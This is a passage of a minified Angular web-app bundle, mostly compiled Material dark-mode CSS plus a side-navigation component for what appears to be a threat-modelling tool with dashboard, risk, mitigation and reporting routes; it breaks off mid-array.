.mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]{background:#212121;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.darkMode[_ngcontent-%COMP%]   .mat-tree[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-tree-node[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-snack-bar-container[_ngcontent-%COMP%]{color:#000000de;background:#fafafa;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-simple-snackbar-action[_ngcontent-%COMP%]{color:inherit}html[_ngcontent-%COMP%], body[_ngcontent-%COMP%]{margin:0;padding:0;height:100%;font-family:Arial,Helvetica,sans-serif}.website-container[_ngcontent-%COMP%]{height:100%;display:flex;flex-direction:column}.drawer-container[_ngcontent-%COMP%]{width:100%;height:100%;background-color:#0000;margin-bottom:21px}.messages-info[_ngcontent-%COMP%]{color:#fff;font-weight:700}.messages-success[_ngcontent-%COMP%]{background-color:#35d10de6!important;color:#fff;font-weight:700}.messages-warning[_ngcontent-%COMP%]{background-color:#eeca00e6!important;color:#fff;font-weight:700}.messages-error[_ngcontent-%COMP%]{background-color:#ca1c1ce6!important;color:#fff;font-weight:700}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.mat-tab-body-wrapper[_ngcontent-%COMP%]{height:100%}.mat-tooltip[_ngcontent-%COMP%]{font-size:small!important;background-color:gray!important}.expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{flex-basis:0}.expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{justify-content:space-between;align-items:center}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{padding:.5em .5em 0!important}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .5em!important}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:10px!important}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:10px!important}.mat-menu-panel[_ngcontent-%COMP%]{min-height:35px!important}  .mat-menu-content{padding-top:0!important;padding-bottom:0!important}.mat-menu-item[_ngcontent-%COMP%], .mat-option[_ngcontent-%COMP%]{line-height:35px!important;height:35px!important}.status-bar[_ngcontent-%COMP%]{position:fixed;width:100%;bottom:0;left:0;height:22px;font-size:smaller;color:#fff;border-top-style:solid;border-color:#fff;border-width:0px;z-index:99999}button[_ngcontent-%COMP%]{height:22px!important;border-radius:2px;bottom:1px}.statusBtn[_ngcontent-%COMP%]{width:auto;font-size:14px!important;line-height:22px!important}.statusBtn[_ngcontent-%COMP%]:hover{background-color:#ffffff26!important}.iconBtn[_ngcontent-%COMP%]{height:22px!important;line-height:22px!important;transform:scale(.68)}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:small;color:#fff}']}),t})();function act(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().OpenGitHubUrl())}),s(1,"\n          "),it(2,"fa-icon",24),s(3,"\n          "),m(4,"span"),s(5),u(),s(6,"\n        "),u()}if(2&t){const e=B();C(2),V("icon",e.faCodeBranch),C(3),ct("",e.dataService.UserAccount," (GitHub)")}}function nct(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().theme.SetDarkMode(!1))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"brightness_5"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"side-nav.lightMode")))}function oct(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().theme.SetDarkMode(!0))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"bedtime"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"side-nav.darkMode")))}let _f=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.localization=i,this.locStorage=n,this.dataService=r,this.messagesService=c,this.router=d,this.dialog=T,this.selectedRoute="",this.sameRoute=new Tt,this.faCodeBranch=Z5}ngAfterViewInit(){this.setSelectedClass(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>this.setSelectedClass(e))}IsSelected(e,i=!1){return e==this.selectedRoute&&this.theme.IsDarkMode==i}IsHoveredOrSelected(e,i=!1){return this.IsSelected(e,i)||e==this.hovered&&this.theme.IsDarkMode==i}ChangeLanguage(e){this.localization.Locale=e}Clear(){let e=()=>{this.locStorage.Clear(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}ResetLayout(){let e=()=>{this.locStorage.ResetLayout(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}OpenCookieConsent(){this.dialog.OpenCookieConsentDialog()}OpenGitHubUrl(){window.open(this.dataService.UserURL,"_blank")}OpenYouTubePlaylist(){window.open("https://www.youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","_blank")}OpenGlossary(){this.dialog.OpenGlossaryDialog()}OnMouseEnter(e){this.hovered=e}OnMouseLeave(){this.hovered=""}OnClick(e){e==this.router.url?this.sameRoute.emit():this.router.navigate([e])}setSelectedClass(e){if(""!=this.selectedRoute){let i=document.getElementsByClassName("sidenav-icon-button");for(let n=0;n<i.length;n++)i[n].classList.remove("btn-selected-dark"),i[n].classList.remove("btn-selected-light"),i[n].name&&i[n].name.endsWith(this.selectedRoute)&&i[n].classList.add(e?"btn-selected-dark":"btn-selected-light")}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(yT),Ee(_r),Ee(Yi),Ee(A2),Ee(Oo),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-side-nav"]],inputs:{selectedRoute:"selectedRoute"},outputs:{sameRoute:"sameRoute"},decls:262,vars:191,consts:[[2,"height","100%"],["name","/home","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["mat-icon-button",""],["name","/dashboard","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/modeling","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/risk","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/mitigation","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/reporting","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/configuration","routerLink","/configuration","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],[2,"position","absolute","bottom","0px"],["matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","mouseenter","mouseleave"],["mat-icon-button","",3,"matMenuTriggerFor"],["tourAnchor","change-settings"],["color","primary"],["menu","matMenu"],["mat-menu-item","","routerLink","/login"],["mat-me